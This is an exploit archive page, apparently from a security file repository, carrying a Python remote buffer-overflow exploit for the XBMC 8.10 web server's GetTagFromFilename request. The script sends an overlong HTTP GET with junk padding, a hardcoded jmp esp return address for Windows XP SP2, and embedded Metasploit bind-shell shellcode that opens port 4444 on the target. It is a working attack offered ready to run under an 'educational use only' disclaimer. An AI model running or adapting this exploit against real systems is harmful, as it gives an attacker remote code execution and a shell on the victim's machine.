XBMC 8.10 Tag Overflow

XBMC 8.10 Tag Overflow: Posted Apr 1, 2009; Authored by n00b; XBMC version 8.10 get tag from file name remote buffer overflow exploit.; tags | exploit, remote, overflow; SHA-256 | c7b8919d2d1d3063802ac34741da2d095d10aa6076e4a9487051c26951ba38f6; Download | Favorite | View

XBMC 8.10 Tag Overflow

#!/usr/bin/env python 
'''
Xbmc get tag from file name request remote buffer overflow 8.10 !!! 
 
Tested:Win xp sp2 eng
Vendor url:http://xbmc.org/ 
 
versions affected: 
Linux windows < tested 
other versions are also possibly affected. 
Release date:April the 1st 2009 

Restrictions:No filtering needed.
This exploit happens when parsing and overly long id3
tag to the web server.Dont think i covered this much
in the poc code as i was running out of time on this
exploit.


We are able to overwrite the exception handlers also so 
creating a reliable exploit for vista and xps3 shouldn't 
be to hard have a look there are some modules loaded with 
out /safe seh. 

Credits to n00b for finding the buffer overflow and writing 
poc code and exploit.

----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''


import sys, socket 
import struct

port = 80 
host = sys.argv[1] 

Start_url ='xbmcCmds/xbmcHttp?command=GetTagFromFilename(C:/'
Junk_buffer = 'A'*1033
Jump_esp = struct.pack('<L',0x77F84143)

Shell_code=(#win32_bind -EXITFUNC=seh LPORT=4444 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
"\x4e\x36\x46\x32\x46\x32\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x37"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x58"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x58"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x47\x45\x4e\x4b\x48"
"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x48\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38"
"\x49\x48\x4e\x36\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d"
"\x46\x46\x4b\x48\x43\x44\x42\x53\x4b\x38\x42\x34\x4e\x30\x4b\x38"
"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x45\x4a\x36"
"\x50\x58\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
"\x43\x35\x48\x36\x4a\x46\x43\x33\x44\x53\x4a\x46\x47\x37\x43\x37"
"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x35\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x45\x4c\x36\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35"
"\x4f\x4f\x48\x4d\x43\x35\x43\x55\x43\x55\x43\x55\x43\x55\x43\x34"
"\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x51"
"\x4e\x45\x48\x36\x43\x35\x49\x58\x41\x4e\x45\x59\x4a\x46\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41"
"\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52"
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x45\x4f\x4f\x42\x4d"
"\x4a\x46\x45\x4e\x49\x44\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
"\x42\x35\x46\x45\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x46"
"\x4d\x56\x49\x48\x45\x4e\x4c\x46\x42\x35\x49\x35\x49\x32\x4e\x4c"
"\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x41\x53\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x34\x4e\x52"
"\x43\x59\x4d\x48\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x54\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x45\x41\x55\x41\x35\x41\x45\x4c\x36"
"\x41\x30\x41\x55\x41\x35\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f"
"\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a"

)

End_url ='.mp3)'

# create a socket object called 'c' 
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

# connect to the socket 
c.connect((host, port)) 

Request = (Start_url + Junk_buffer + Jump_esp + Shell_code + End_url)

# create a file-like object to read 
fileobj = c.makefile('r', 0) 

# Ask the server for the file 
fileobj.write("GET /"+Request+" HTTP/1.1\n\n")

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

XBMC 8.10 Tag Overflow

XBMC 8.10 Tag Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

XBMC 8.10 Tag Overflow

Share This

XBMC 8.10 Tag Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems